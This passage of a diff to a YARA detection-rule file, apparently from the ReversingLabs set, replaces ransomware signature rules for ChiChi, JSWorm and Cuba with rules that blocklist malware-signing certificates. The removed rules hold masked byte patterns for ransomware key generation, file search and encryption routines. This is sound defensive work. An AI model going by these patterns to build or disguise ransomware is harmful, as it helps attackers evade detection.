-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF
-            15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5
-            5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40
-            88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D
-            ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A
-            ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8
-            8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
-            C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75
-            ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8
-        }
-		$encrypt_files_p3 = {
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F
-            8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ??
-            0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A
-            4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4
-            8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
-        }
-		$encrypt_files_p4 = {
-            C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ??
-            43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
-            56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ??
-            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6
-            ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telefonicasa" and pe.signatures [ i ] . serial == "08:3e:3f" and 999002664 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ChiChi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "95062789-a55d-5c1c-a359-206b58f311e5"
-		date = "2022-02-14"
-		modified = "2022-02-14"
+		id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15792-L15808"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ChiChi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85
-            FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D
-            4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74
-            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6
-            74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ??
-            83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57
-            6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B
-            8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ??
-            ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$find_files = {
-            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF
-            D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ??
-            56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
-            ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83
-            7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects JSWorm ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4702cc3-1e08-5631-b832-5d28cb92a819"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15810-L15826"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "JSWorm"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ??
-            0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73
-            ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6
-            85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8
-        }
-		$find_drives = {
-            68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01
-            41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B
-            CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66
-            89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85
-            ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3 E8 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ??
-            72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89
-            85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53
-            FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
-        }
-		$encrypt_files_p2 = {
-            8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ??
-            6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0
-            C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ??
-            50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56
-            FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_drives and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cuba ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15828-L15844"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cuba"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45
-            ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43
-            45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6
-            45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
-            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ??
-            8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F
-            43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ??
-            83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9
-            ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1
-        }
-		$find_files_p2 = {
